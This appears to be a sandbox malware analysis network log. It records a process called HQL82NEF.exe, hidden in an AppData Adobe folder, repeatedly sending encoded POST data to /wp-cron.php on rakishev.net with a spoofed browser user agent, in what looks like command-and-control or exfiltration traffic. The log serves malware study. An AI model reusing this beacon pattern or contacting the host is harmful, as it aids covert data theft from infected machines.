2023-10-03 20:38:40 UTC	4102	OUT	Data Raw: 4d 79 62 46 59 48 6d 72 49 37 42 6c 37 31 45 46 6f 6b 54 31 6c 47 54 66 78 4f 69 36 67 7a 77 65 64 56 41 51 63 54 54 62 35 51 49 71 70 38 44 76 74 58 30 69 63 62 2f 72 34 55 52 30 6c 44 39 59 69 59 25 32 42 57 48 37 55 35 37 53 6e 45 52 43 42 48 4e 47 32 39 38 4d 66 70 64 25 32 42 67 64 59 71 54 78 5a 6f 79 31 32 55 2f 6f 68 53 6f 74 35 6b 41 6c 35 68 39 64 4d 77 64 34 35 42 36 74 48 39 42 53 76 36 7a 52 37 72 37 63 59 44 70 67 4c 53 4c 45 73 2f 4c 25 32 42 72 36 37 71 65 49 7a 34 44 6f 4f 4e 6b 77 31 43 46 2f 47 72 6e 78 41 32 63 6f 47 66 59 32 41 4c 47 42 51 66 4c 4b 58 52 39 49 54 50 64 6c 71 53 61 74 41 78 53 6d 33 55 56 56 47 61 6e 34 34 48 6a 50 74 64 59 73 6a 70 46 63 4f 4f 41 51 4f 30 25 32 42 64 76 44 33 41 61 62 48 54 67 5a 51 4d 4c 4b 34 76 4f Data Ascii: MybFYHmrI7Bl71EFokT1lGTfxOi6gzwedVAQcTTb5QIqp8DvtX0icb/r4UR0lD9YiY%2BWH7U57SnERCBHNG298Mfpd%2BgdYqTxZoy12U/ohSot5kAl5h9dMwd45B6tH9BSv6zR7r7cYDpgLSLEs/L%2Br67qeIz4DoONkw1CF/GrnxA2coGfY2ALGBQfLKXR9ITPdlqSatAxSm3UVVGan44HjPtdYsjpFcOOAQO0%2BdvD3AabHTgZQMLK4vO
2023-10-03 20:38:40 UTC	4118	OUT	Data Raw: 61 Data Ascii: a
2023-10-03 20:38:40 UTC	4118	OUT	Data Raw: 63 79 4e 32 75 32 35 64 57 5a 66 53 55 73 30 54 64 59 73 47 7a 49 45 6d 36 63 4c 39 4d 54 36 6a 4d 4a 4b 78 35 49 71 35 30 77 7a 47 63 77 77 50 34 78 76 41 30 2f 64 46 57 45 55 61 64 53 38 75 65 6f 67 32 4d 6e 61 50 48 6b 52 65 73 58 71 48 57 69 25 32 42 73 4f 4f 46 41 67 66 46 6f 41 78 2f 38 5a 37 4c 4f 34 75 51 55 4d 55 4c 2f 47 4f 74 66 54 7a 5a 78 68 52 2f 56 72 36 42 46 78 63 78 41 30 46 67 35 4c 72 70 51 65 55 69 55 59 33 79 42 31 4e 73 72 25 32 42 72 6b 58 61 48 73 59 65 4e 64 5a 6b 6c 62 6d 4e 79 73 6f 31 52 4d 4c 54 33 4a 61 54 25 32 42 46 70 37 69 77 49 33 78 56 54 67 51 6d 78 37 4c 46 58 48 31 64 59 41 2f 69 35 43 72 4a 43 65 4d 76 79 79 75 2f 34 61 69 63 76 6b 70 76 66 50 48 73 42 4d 55 32 75 41 61 48 79 77 66 65 34 4b 63 54 35 66 69 68 44 71 Data Ascii: cyN2u25dWZfSUs0TdYsGzIEm6cL9MT6jMJKx5Iq50wzGcwwP4xvA0/dFWEUadS8ueog2MnaPHkResXqHWi%2BsOOFAgfFoAx/8Z7LO4uQUMUL/GOtfTzZxhR/Vr6BFxcxA0Fg5LrpQeUiUY3yB1Nsr%2BrkXaHsYeNdZklbmNyso1RMLT3JaT%2BFp7iwI3xVTgQmx7LFXH1dYA/i5CrJCeMvyyu/4aicvkpvfPHsBMU2uAaHywfe4KcT5fihDq
2023-10-03 20:38:40 UTC	4134	OUT	Data Raw: 45 Data Ascii: E
2023-10-03 20:38:40 UTC	4134	OUT	Data Raw: 7a 39 50 31 5a 31 36 37 35 63 4c 45 50 42 33 53 49 66 35 75 47 79 6e 4a 36 5a 37 4c 44 6d 54 58 47 6d 63 46 42 53 4e 52 46 74 4b 7a 52 49 58 31 66 4c 38 31 61 75 43 52 34 58 47 50 4b 41 5a 43 57 6f 4f 75 4c 5a 6d 59 6f 47 45 78 6d 69 76 4d 6d 25 32 42 69 68 65 65 43 30 41 52 50 45 44 46 4b 33 6f 67 58 6f 64 47 49 73 57 45 4d 6d 79 35 74 44 44 2f 79 46 44 44 41 74 49 7a 62 6a 74 69 58 61 4d 6b 56 54 43 69 68 6a 39 59 75 36 30 43 67 46 39 36 6d 4e 37 77 53 4b 46 50 63 6a 52 45 48 75 4d 7a 6c 51 4f 4c 73 59 34 33 75 4f 4f 47 66 72 63 54 61 69 65 32 37 4b 77 6c 6f 46 5a 7a 7a 77 6f 73 44 48 34 35 42 78 30 62 35 79 52 4f 69 78 41 44 61 77 47 59 67 49 46 55 44 48 35 64 6e 4f 54 4d 70 74 74 4c 69 33 51 69 71 78 38 5a 55 32 4e 6d 4f 59 67 2f 49 38 41 38 76 66 37 Data Ascii: z9P1Z1675cLEPB3SIf5uGynJ6Z7LDmTXGmcFBSNRFtKzRIX1fL81auCR4XGPKAZCWoOuLZmYoGExmivMm%2BiheeC0ARPEDFK3ogXodGIsWEMmy5tDD/yFDDAtIzbjtiXaMkVTCihj9Yu60CgF96mN7wSKFPcjREHuMzlQOLsY43uOOGfrcTaie27KwloFZzzwosDH45Bx0b5yROixADawGYgIFUDH5dnOTMpttLi3Qiqx8ZU2NmOYg/I8A8vf7
2023-10-03 20:38:41 UTC	4149	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:38:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=f1v0EcsBmJ8wM3o1Vef5VxoTNpb5tdjcvy2YT7x3GXuWyNX1TJJvYBjNY2Pi8rMzO0vICKk2elikfn2D%2BOzQJcT3Q4r0czn4lqsfqsrcRAl3%2BnIOesKdF9MQpwm2cYU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fd756a76801b-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	192.168.2.4	49906	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:38:51 UTC	4149	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 326 Expect: 100-continue
2023-10-03 20:38:51 UTC	4150	IN	HTTP/1.1 100 Continue
2023-10-03 20:38:51 UTC	4150	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:38:51 UTC	4150	OUT	Data Raw: 3d 72 71 36 35 62 59 64 34 75 48 47 65 6d 48 70 63 48 6b 33 37 67 56 78 59 33 46 33 4a 4b 57 42 25 32 42 2f 4c 69 67 6f 6e 4f 76 67 38 5a 42 71 4c 72 61 73 59 71 36 77 6f 78 63 33 6a 55 38 6c 72 48 76 54 4a 35 42 33 34 57 25 32 42 7a 78 4b 6e 64 44 43 66 6c 61 73 54 51 6d 69 32 38 33 6f 55 38 33 77 55 66 47 5a 48 68 71 54 50 38 53 73 32 62 45 39 33 25 32 42 4c 42 38 7a 73 37 54 36 25 32 42 6c 47 34 64 39 4f 53 54 4f 69 39 41 4e 4b 6d 7a 69 7a 73 39 4a 34 75 4f 70 38 75 31 32 78 58 43 35 6e 58 36 59 66 2f 38 46 72 37 53 73 57 59 56 6e 6e 36 47 65 54 61 6b 56 75 6e 31 25 32 42 79 61 61 46 63 77 5a 54 66 56 4b 39 51 4b 58 34 71 4e 2f 30 2f 61 47 4e 6e 64 45 38 59 65 6f 33 70 43 63 67 45 63 43 4e 4c 44 53 43 63 39 64 42 38 75 62 68 25 32 42 77 35 69 53 6a 79 Data Ascii: =rq65bYd4uHGemHpcHk37gVxY3F3JKWB%2B/LigonOvg8ZBqLrasYq6woxc3jU8lrHvTJ5B34W%2BzxKndDCflasTQmi283oU83wUfGZHhqTP8Ss2bE93%2BLB8zs7T6%2BlG4d9OSTOi9ANKmzizs9J4uOp8u12xXC5nX6Yf/8Fr7SsWYVnn6GeTakVun1%2ByaaFcwZTfVK9QKX4qN/0/aGNndE8Yeo3pCcgEcCNLDSCc9dB8ubh%2Bw5iSjy
2023-10-03 20:38:52 UTC	4261	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:38:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=euWG3WCxTtI8fmxQp%2FdunbtjYxfPq%2BufU4F73VqAUo4JyxmLzaGm3Y%2FbvXmcVKR1bSueYW2urviv%2FZKjhEns2FG9LZHD9CKLUFtC9fvygUhQ78ZUks5WOk4ZEIvs2tE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fdbe480a56e6-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
47	192.168.2.4	49907	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:38:51 UTC	4149	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 280 Expect: 100-continue Connection: Keep-Alive
2023-10-03 20:38:51 UTC	4150	IN	HTTP/1.1 100 Continue
2023-10-03 20:38:51 UTC	4150	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:38:51 UTC	4150	OUT	Data Raw: 3d 6b 45 42 35 7a 77 54 78 44 74 45 41 6f 59 7a 46 54 62 6f 55 4d 73 4e 4d 32 73 69 43 75 70 43 65 2f 6d 78 70 52 72 4a 4c 72 4f 68 25 32 42 36 31 31 64 42 69 65 6b 72 4a 74 34 38 51 4e 56 6a 4c 77 76 34 53 33 34 59 5a 39 79 62 54 31 4d 6a 6a 45 32 36 70 52 4a 52 45 69 7a 62 49 39 79 6a 30 44 47 55 45 5a 6e 61 61 67 47 73 52 79 72 70 58 67 59 6c 67 44 4c 42 4d 6c 71 76 45 67 4b 25 32 42 47 75 55 6a 53 45 75 30 73 73 66 4f 62 54 47 61 68 6f 46 59 6d 5a 52 37 44 66 4a 71 75 4d 4c 6f 49 47 58 74 4c 39 73 56 67 41 6f 64 42 38 65 58 74 43 39 7a 2f 44 44 66 5a 79 4a 47 72 46 30 44 46 70 4f 36 75 54 78 2f 45 52 45 34 69 37 64 25 32 42 62 4d 30 49 5a 73 34 41 44 6b 44 70 33 59 6d 59 44 35 37 38 25 32 42 56 49 35 47 25 32 42 39 47 58 78 63 4b 63 52 72 38 7a 65 6d Data Ascii: =kEB5zwTxDtEAoYzFTboUMsNM2siCupCe/mxpRrJLrOh%2B611dBiekrJt48QNVjLwv4S34YZ9ybT1MjjE26pRJREizbI9yj0DGUEZnaagGsRyrpXgYlgDLBMlqvEgK%2BGuUjSEu0ssfObTGahoFYmZR7DfJquMLoIGXtL9sVgAodB8eXtC9z/DDfZyJGrF0DFpO6uTx/ERE4i7d%2BbM0IZs4ADkDp3YmYD578%2BVI5G%2B9GXxcKcRr8zem

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
48	192.168.2.4	49908	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:38:51 UTC	4150	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 112878 Expect: 100-continue Connection: Keep-Alive
2023-10-03 20:38:51 UTC	4151	IN	HTTP/1.1 100 Continue
2023-10-03 20:38:51 UTC	4151	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:38:51 UTC	4151	OUT	Data Raw: 3d 6d 77 6a 4f 70 4f 61 59 65 36 34 70 42 63 51 30 61 54 65 33 4d 4d 52 39 51 47 75 4e 6b 34 32 4e 55 4d 48 79 62 71 7a 58 75 78 67 6a 44 38 4d 65 61 71 4c 6e 49 56 54 6c 68 34 37 49 6f 71 4a 54 59 78 48 46 7a 66 2f 5a 51 74 70 70 78 37 4d 42 47 71 70 2f 25 32 42 79 71 35 4b 71 55 49 6f 66 47 55 71 59 43 5a 39 4f 6c 4c 37 43 57 67 6d 7a 32 33 69 66 4b 31 38 49 49 4d 72 39 62 78 66 43 58 68 76 45 49 48 32 6f 48 34 52 57 41 6a 32 37 4a 57 45 7a 42 58 46 78 58 36 36 71 31 4a 69 4e 41 54 48 33 79 31 39 47 6e 44 30 30 43 77 45 44 73 37 4b 32 61 47 77 57 41 68 6f 73 62 51 54 43 61 77 56 6b 2f 56 6c 41 58 78 4a 4d 4b 33 64 53 4f 78 35 76 59 59 79 46 4f 7a 7a 75 79 78 66 39 77 57 55 4d 43 52 35 4c 69 34 38 6a 25 32 42 69 68 79 5a 59 6c 66 46 73 48 65 65 79 36 70 Data Ascii: =mwjOpOaYe64pBcQ0aTe3MMR9QGuNk42NUMHybqzXuxgjD8MeaqLnIVTlh47IoqJTYxHFzf/ZQtppx7MBGqp/%2Byq5KqUIofGUqYCZ9OlL7CWgmz23ifK18IIMr9bxfCXhvEIH2oH4RWAj27JWEzBXFxX66q1JiNATH3y19GnD00CwEDs7K2aGwWAhosbQTCawVk/VlAXxJMK3dSOx5vYYyFOzzuyxf9wWUMCR5Li48j%2BihyZYlfFsHeey6p
2023-10-03 20:38:51 UTC	4167	OUT	Data Raw: 34 Data Ascii: 4
2023-10-03 20:38:51 UTC	4167	OUT	Data Raw: 77 77 54 62 34 6e 47 79 43 35 73 75 71 61 57 6e 4c 49 67 74 6d 72 65 54 44 56 25 32 42 67 68 47 2f 31 63 57 55 51 66 75 36 62 56 6a 56 45 47 45 42 4a 6d 63 52 69 6d 43 33 35 6d 44 6f 47 77 4f 39 51 64 46 47 65 52 30 70 64 4d 56 5a 4e 25 32 42 73 4d 52 46 4f 75 57 41 44 39 2f 79 4a 57 48 62 36 71 35 4d 32 36 75 33 31 45 56 4a 35 35 6b 69 46 6d 50 63 76 6d 4d 59 51 4d 57 69 46 59 25 32 42 68 67 25 32 42 4d 6a 73 55 32 79 62 78 6e 48 79 37 74 78 48 78 4b 41 71 64 73 50 6e 48 63 67 2f 2f 4a 41 69 53 77 33 32 63 63 41 72 4d 70 61 68 68 57 74 59 31 50 77 52 50 64 4f 71 70 62 4d 71 74 74 4e 59 4d 55 6a 77 6a 34 4e 30 30 52 31 39 76 47 6d 67 5a 53 47 4d 63 4c 2f 64 44 6c 6a 79 68 75 6f 48 44 70 42 78 68 6c 45 6d 37 48 35 34 58 67 73 7a 51 42 66 47 35 70 50 35 44 Data Ascii: wwTb4nGyC5suqaWnLIgtmreTDV%2BghG/1cWUQfu6bVjVEGEBJmcRimC35mDoGwO9QdFGeR0pdMVZN%2BsMRFOuWAD9/yJWHb6q5M26u31EVJ55kiFmPcvmMYQMWiFY%2Bhg%2BMjsU2ybxnHy7txHxKAqdsPnHcg//JAiSw32ccArMpahhWtY1PwRPdOqpbMqttNYMUjwj4N00R19vGmgZSGMcL/dDljyhuoHDpBxhlEm7H54XgszQBfG5pP5D
2023-10-03 20:38:51 UTC	4183	OUT	Data Raw: 37 Data Ascii: 7
2023-10-03 20:38:51 UTC	4183	OUT	Data Raw: 50 47 58 2f 39 77 63 68 4f 2f 67 77 79 78 66 77 64 45 54 71 31 68 35 4f 6a 6c 76 4a 77 4e 2f 35 67 6d 48 64 63 30 79 2f 79 4a 42 25 32 42 55 2f 51 44 73 71 79 5a 44 4e 52 74 58 32 66 73 66 25 32 42 6e 32 47 6d 65 34 4d 45 56 78 43 7a 6f 67 75 6b 36 74 6c 4e 66 4b 37 4c 73 4c 6e 57 78 32 62 7a 70 34 37 6b 66 54 73 6d 56 76 6e 79 73 37 56 2f 53 6f 71 39 30 55 6a 53 45 4d 43 48 52 4c 73 58 4b 64 45 37 6c 65 77 39 33 4c 50 42 41 39 69 51 72 4a 56 64 34 63 6b 58 79 4a 4e 64 49 4f 51 76 68 31 77 33 33 46 4e 6d 33 49 58 47 6c 78 73 68 6c 78 32 67 43 62 6f 53 73 6c 49 48 4f 62 67 36 54 72 32 67 38 63 33 31 77 4a 54 38 6b 4a 6f 6a 62 55 72 55 30 68 68 43 42 61 43 6a 58 59 37 55 49 4f 61 64 67 74 74 63 6d 66 32 6a 50 36 73 35 2f 68 77 42 62 32 74 58 4d 47 50 2f 59 Data Ascii: PGX/9wchO/gwyxfwdETq1h5OjlvJwN/5gmHdc0y/yJB%2BU/QDsqyZDNRtX2fsf%2Bn2Gme4MEVxCzoguk6tlNfK7LsLnWx2bzp47kfTsmVvnys7V/Soq90UjSEMCHRLsXKdE7lew93LPBA9iQrJVd4ckXyJNdIOQvh1w33FNm3IXGlxshlx2gCboSslIHObg6Tr2g8c31wJT8kJojbUrU0hhCBaCjXY7UIOadgttcmf2jP6s5/hwBb2tXMGP/Y
2023-10-03 20:38:51 UTC	4198	OUT	Data Raw: 5a Data Ascii: Z
2023-10-03 20:38:51 UTC	4198	OUT	Data Raw: 53 43 70 7a 52 78 73 38 56 4c 65 4f 4a 64 76 75 42 4c 44 67 79 2f 62 65 65 77 6a 56 4f 4d 6f 63 4c 66 75 7a 78 78 48 2f 32 52 64 59 41 4f 73 67 41 35 25 32 42 4c 6e 35 33 76 33 68 66 47 57 44 73 68 4b 70 79 56 50 38 72 46 52 4c 6c 58 73 79 64 33 65 61 73 36 66 6e 33 6f 49 4f 46 6a 47 25 32 42 6d 63 61 68 4f 41 78 4e 5a 72 53 6e 38 69 61 4b 4d 55 25 32 42 2f 57 77 68 32 7a 79 78 66 56 72 4f 37 70 56 69 63 37 44 67 49 68 42 53 67 4d 64 44 75 68 76 51 35 4d 4f 69 75 4b 4b 58 47 57 78 57 4a 4a 56 50 32 53 73 50 39 4a 55 55 59 43 6d 75 4f 41 61 66 61 6e 36 35 57 48 6b 4b 31 75 35 43 4e 4e 7a 42 31 64 39 2f 45 32 31 6c 6e 59 38 42 55 65 4b 69 4d 49 6c 57 30 47 35 6f 51 4a 56 44 75 34 46 77 6f 56 76 43 46 37 33 34 64 44 31 49 76 30 55 79 72 45 6d 42 6f 6d 6e 71 Data Ascii: SCpzRxs8VLeOJdvuBLDgy/beewjVOMocLfuzxxH/2RdYAOsgA5%2BLn53v3hfGWDshKpyVP8rFRLlXsyd3eas6fn3oIOFjG%2BmcahOAxNZrSn8iaKMU%2B/Wwh2zyxfVrO7pVic7DgIhBSgMdDuhvQ5MOiuKKXGWxWJJVP2SsP9JUUYCmuOAafan65WHkK1u5CNNzB1d9/E21lnY8BUeKiMIlW0G5oQJVDu4FwoVvCF734dD1Iv0UyrEmBomnq
2023-10-03 20:38:51 UTC	4214	OUT	Data Raw: 34 Data Ascii: 4
2023-10-03 20:38:51 UTC	4214	OUT	Data Raw: 4d 79 62 46 59 48 6d 72 49 37 42 6c 37 31 45 46 6f 6b 54 31 6c 47 54 66 78 4f 69 36 67 7a 77 65 64 56 41 51 63 54 54 62 35 51 49 71 70 38 44 76 74 58 30 69 63 62 2f 72 34 55 52 30 6c 44 39 59 69 59 25 32 42 57 48 37 55 35 37 53 6e 45 52 43 42 48 4e 47 32 39 38 4d 66 70 64 25 32 42 67 64 59 71 54 78 5a 6f 79 31 32 55 2f 6f 68 53 6f 74 35 6b 41 6c 35 68 39 64 4d 77 64 34 35 42 36 74 48 39 42 53 76 36 7a 52 37 72 37 63 59 44 70 67 4c 53 4c 45 73 2f 4c 25 32 42 72 36 37 71 65 49 7a 34 44 6f 4f 4e 6b 77 31 43 46 2f 47 72 6e 78 41 32 63 6f 47 66 59 32 41 4c 47 42 51 66 4c 4b 58 52 39 49 54 50 64 6c 71 53 61 74 41 78 53 6d 33 55 56 56 47 61 6e 34 34 48 6a 50 74 64 59 73 6a 70 46 63 4f 4f 41 51 4f 30 25 32 42 64 76 44 33 41 61 62 48 54 67 5a 51 4d 4c 4b 34 76 4f Data Ascii: MybFYHmrI7Bl71EFokT1lGTfxOi6gzwedVAQcTTb5QIqp8DvtX0icb/r4UR0lD9YiY%2BWH7U57SnERCBHNG298Mfpd%2BgdYqTxZoy12U/ohSot5kAl5h9dMwd45B6tH9BSv6zR7r7cYDpgLSLEs/L%2Br67qeIz4DoONkw1CF/GrnxA2coGfY2ALGBQfLKXR9ITPdlqSatAxSm3UVVGan44HjPtdYsjpFcOOAQO0%2BdvD3AabHTgZQMLK4vO
2023-10-03 20:38:51 UTC	4230	OUT	Data Raw: 61 Data Ascii: a
2023-10-03 20:38:51 UTC	4230	OUT	Data Raw: 63 79 4e 32 75 32 35 64 57 5a 66 53 55 73 30 54 64 59 73 47 7a 49 45 6d 36 63 4c 39 4d 54 36 6a 4d 4a 4b 78 35 49 71 35 30 77 7a 47 63 77 77 50 34 78 76 41 30 2f 64 46 57 45 55 61 64 53 38 75 65 6f 67 32 4d 6e 61 50 48 6b 52 65 73 58 71 48 57 69 25 32 42 73 4f 4f 46 41 67 66 46 6f 41 78 2f 38 5a 37 4c 4f 34 75 51 55 4d 55 4c 2f 47 4f 74 66 54 7a 5a 78 68 52 2f 56 72 36 42 46 78 63 78 41 30 46 67 35 4c 72 70 51 65 55 69 55 59 33 79 42 31 4e 73 72 25 32 42 72 6b 58 61 48 73 59 65 4e 64 5a 6b 6c 62 6d 4e 79 73 6f 31 52 4d 4c 54 33 4a 61 54 25 32 42 46 70 37 69 77 49 33 78 56 54 67 51 6d 78 37 4c 46 58 48 31 64 59 41 2f 69 35 43 72 4a 43 65 4d 76 79 79 75 2f 34 61 69 63 76 6b 70 76 66 50 48 73 42 4d 55 32 75 41 61 48 79 77 66 65 34 4b 63 54 35 66 69 68 44 71 Data Ascii: cyN2u25dWZfSUs0TdYsGzIEm6cL9MT6jMJKx5Iq50wzGcwwP4xvA0/dFWEUadS8ueog2MnaPHkResXqHWi%2BsOOFAgfFoAx/8Z7LO4uQUMUL/GOtfTzZxhR/Vr6BFxcxA0Fg5LrpQeUiUY3yB1Nsr%2BrkXaHsYeNdZklbmNyso1RMLT3JaT%2BFp7iwI3xVTgQmx7LFXH1dYA/i5CrJCeMvyyu/4aicvkpvfPHsBMU2uAaHywfe4KcT5fihDq
2023-10-03 20:38:51 UTC	4246	OUT	Data Raw: 45 Data Ascii: E
2023-10-03 20:38:51 UTC	4246	OUT	Data Raw: 7a 39 50 31 5a 31 36 37 35 63 4c 45 50 42 33 53 49 66 35 75 47 79 6e 4a 36 5a 37 4c 44 6d 54 58 47 6d 63 46 42 53 4e 52 46 74 4b 7a 52 49 58 31 66 4c 38 31 61 75 43 52 34 58 47 50 4b 41 5a 43 57 6f 4f 75 4c 5a 6d 59 6f 47 45 78 6d 69 76 4d 6d 25 32 42 69 68 65 65 43 30 41 52 50 45 44 46 4b 33 6f 67 58 6f 64 47 49 73 57 45 4d 6d 79 35 74 44 44 2f 79 46 44 44 41 74 49 7a 62 6a 74 69 58 61 4d 6b 56 54 43 69 68 6a 39 59 75 36 30 43 67 46 39 36 6d 4e 37 77 53 4b 46 50 63 6a 52 45 48 75 4d 7a 6c 51 4f 4c 73 59 34 33 75 4f 4f 47 66 72 63 54 61 69 65 32 37 4b 77 6c 6f 46 5a 7a 7a 77 6f 73 44 48 34 35 42 78 30 62 35 79 52 4f 69 78 41 44 61 77 47 59 67 49 46 55 44 48 35 64 6e 4f 54 4d 70 74 74 4c 69 33 51 69 71 78 38 5a 55 32 4e 6d 4f 59 67 2f 49 38 41 38 76 66 37 Data Ascii: z9P1Z1675cLEPB3SIf5uGynJ6Z7LDmTXGmcFBSNRFtKzRIX1fL81auCR4XGPKAZCWoOuLZmYoGExmivMm%2BiheeC0ARPEDFK3ogXodGIsWEMmy5tDD/yFDDAtIzbjtiXaMkVTCihj9Yu60CgF96mN7wSKFPcjREHuMzlQOLsY43uOOGfrcTaie27KwloFZzzwosDH45Bx0b5yROixADawGYgIFUDH5dnOTMpttLi3Qiqx8ZU2NmOYg/I8A8vf7

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
49	192.168.2.4	49909	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:39:00 UTC	4262	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 280 Expect: 100-continue
2023-10-03 20:39:00 UTC	4262	IN	HTTP/1.1 100 Continue
2023-10-03 20:39:00 UTC	4262	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:39:00 UTC	4262	OUT	Data Raw: 3d 6b 45 42 35 7a 77 54 78 44 74 45 41 6f 59 7a 46 54 62 6f 55 4d 73 4e 4d 32 73 69 43 75 70 43 65 2f 6d 78 70 52 72 4a 4c 72 4f 68 25 32 42 36 31 31 64 42 69 65 6b 72 4a 74 34 38 51 4e 56 6a 4c 77 76 34 53 33 34 59 5a 39 79 62 54 31 4d 6a 6a 45 32 36 70 52 4a 52 45 69 7a 62 49 39 79 6a 30 44 47 55 45 5a 6e 61 61 67 47 73 52 79 72 70 58 67 59 6c 67 44 4c 42 4d 6c 71 76 45 67 4b 25 32 42 47 75 55 6a 53 45 75 30 73 73 66 4f 62 54 47 61 68 6f 46 59 6d 5a 52 37 44 66 4a 71 75 4d 4c 6f 49 47 58 74 4c 39 73 56 67 41 6f 64 42 38 65 58 74 43 39 7a 2f 44 44 66 5a 79 4a 47 72 46 30 44 46 70 4f 36 75 54 78 2f 45 52 45 34 69 37 64 25 32 42 62 4d 30 49 5a 73 34 41 44 6b 44 70 33 59 6d 59 44 35 37 38 25 32 42 56 49 35 47 25 32 42 39 47 58 78 63 4b 63 52 72 38 7a 65 6d Data Ascii: =kEB5zwTxDtEAoYzFTboUMsNM2siCupCe/mxpRrJLrOh%2B611dBiekrJt48QNVjLwv4S34YZ9ybT1MjjE26pRJREizbI9yj0DGUEZnaagGsRyrpXgYlgDLBMlqvEgK%2BGuUjSEu0ssfObTGahoFYmZR7DfJquMLoIGXtL9sVgAodB8eXtC9z/DDfZyJGrF0DFpO6uTx/ERE4i7d%2BbM0IZs4ADkDp3YmYD578%2BVI5G%2B9GXxcKcRr8zem
2023-10-03 20:39:01 UTC	4373	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:39:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yIlDzLwwf%2BNKtujNBldedHkNSOcT%2BwKeGV%2FRzZEyrAj%2BLR6hDHpycBF1GGoQ4ayCTpIJFGZBZi6J0B1h3x5Xsj34aHcckZLm6oVXA7ZGobl91ICEgO14n087ToR2P0o%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fdf5ac1a3b77-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49799	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:35:16 UTC	2780	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 310 Expect: 100-continue
2023-10-03 20:35:16 UTC	2781	IN	HTTP/1.1 100 Continue
2023-10-03 20:35:16 UTC	2781	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:35:16 UTC	2781	OUT	Data Raw: 3d 71 32 49 62 42 53 64 63 4c 47 2f 61 55 62 48 55 6d 43 31 34 6e 72 33 47 72 5a 59 50 4c 65 36 6f 7a 7a 31 25 32 42 62 61 6a 6f 54 6d 6e 6b 37 54 66 31 35 39 25 32 42 65 6c 6b 65 4d 70 61 4b 6e 77 25 32 42 77 59 4c 77 58 4e 4b 78 42 38 79 2f 46 35 7a 74 72 4f 4e 69 68 6b 32 49 58 54 42 62 4e 36 43 64 30 78 30 45 76 51 32 37 4f 59 48 6e 79 77 46 56 4b 55 57 75 45 79 35 25 32 42 4e 35 35 63 70 51 45 4e 58 48 57 6f 76 32 44 43 5a 54 72 37 58 6a 38 52 74 37 75 53 7a 63 58 72 72 61 2f 59 2f 4c 6c 74 4e 71 4f 77 43 54 50 4f 6f 6f 64 6e 6f 6e 74 6b 73 36 59 34 4f 51 35 63 34 4f 37 75 6a 51 73 36 52 70 72 37 76 76 4c 49 6f 32 57 38 6b 75 53 46 56 36 79 32 44 37 38 6a 4c 34 70 70 2f 43 39 56 51 2f 61 62 6f 62 47 46 4b 54 4d 2f 31 38 4c 6b 51 67 59 43 63 36 68 38 